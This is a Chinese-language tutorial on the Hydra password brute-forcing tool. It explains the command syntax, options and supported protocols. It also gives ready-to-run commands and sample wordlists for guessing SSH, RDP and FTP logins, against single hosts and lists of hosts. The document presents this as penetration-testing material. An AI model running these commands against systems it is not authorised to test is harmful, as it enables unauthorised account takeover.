一、工具介绍
Hydra 是一款用于猜测 / 破解有效用户名 / 密码组合的工具,是世界顶级密码暴力密码破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被 破解关键取决 于破解字典是否足够强大,在网络安全渗透过程中是一款必备的测试工具。
项目地址:https://github.com/vanhauser-thc/thc-hydra
二、使用方法
1、语法
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]选项说明:
-l 用户名 或 -L 文件:使用指定的用户名进行登录,或者从文件中加载多个用户名。
-p 密码 或 -P 文件:尝试使用指定的密码,或者从文件中加载多个密码。
-C 文件:采用冒号分隔的 “用户名:密码” 格式,可替代 -L/-P 选项。
-M 文件:指定要攻击的服务器列表,每行一个条目,用冒号指定端口。
-t 任务数:针对每个目标并行运行指定数量的连接任务(默认值:16)。
-U:显示服务模块的使用详情。
-m 选项:特定模块的选项,查看 -U 输出获取相关信息。
-h:显示更多命令行选项(完整帮助信息)。
服务器:目标可以是域名、IP 地址或 192.168.0.0/24 这样的网段(使用此选项或 -M 选项)。
服务:要破解的服务(支持的协议见下文)。
其他选项:部分服务模块支持额外的输入(使用 -U 查看模块帮助)。2、支持的服务
adam6500、asterisk、cisco、cisco - enable、cobaltstrike、cvs、firebird、ftp [s]、http [s] - {head|get|post}、http [s] - {get|post} - form、http - proxy、http - proxy - urlenum、icq、imap [s]、irc、ldap2 [s]、ldap3 [-{cram|digest} md5][s]、memcached、mongodb、mssql、mysql、nntp、oracle - listener、oracle - sid、pcanywhere、pcnfs、pop3 [s]、postgres、radmin2、rdp、redis、rexec、rlogin、rpcap、rsh、rtsp、s7 - 300、sip、smb、smtp [s]、smtp - enum、snmp、socks5、ssh、sshkey、svn、teamspeak、telnet [s]、vmauthd、vnc、xmpp3、使用示例
示例1,ssh密码破解,针对单IP,单用户名和密码的破解
hydra -l root -p Password111 -t 32 ssh://192.168.20.22
hydra -L users.txt -P passwords.txt -t 32 -M ip.txt -o result.txt ssh示例文件格式
用户名字典文件 (
users.txt):root
admin
test
user
guest
密码字典文件 (
passwords.txt):
123456
password
admin
root
test
示例3,rdp密码破解
分别针对【单用户、单密码 单IP】、【多用户、单密码单IP】、【多用户、多密码 多IP】破解
hydra -l administrator -p Password@1 -t 32 rdp://192.168.20.222
hydra -L users.txt -P passwords.txt -t 4 -W 3 -o result.txt rdp://192.168.20.222
hydra -L users.txt -P passwords.txt -t 4 -W 3 -M ip.txt -o result.txt rdp
示例4,ftp密码破解
hydra -L users.txt -P passwords.txt -t 4 -W 3 -M ip.txt -o result.txt ftp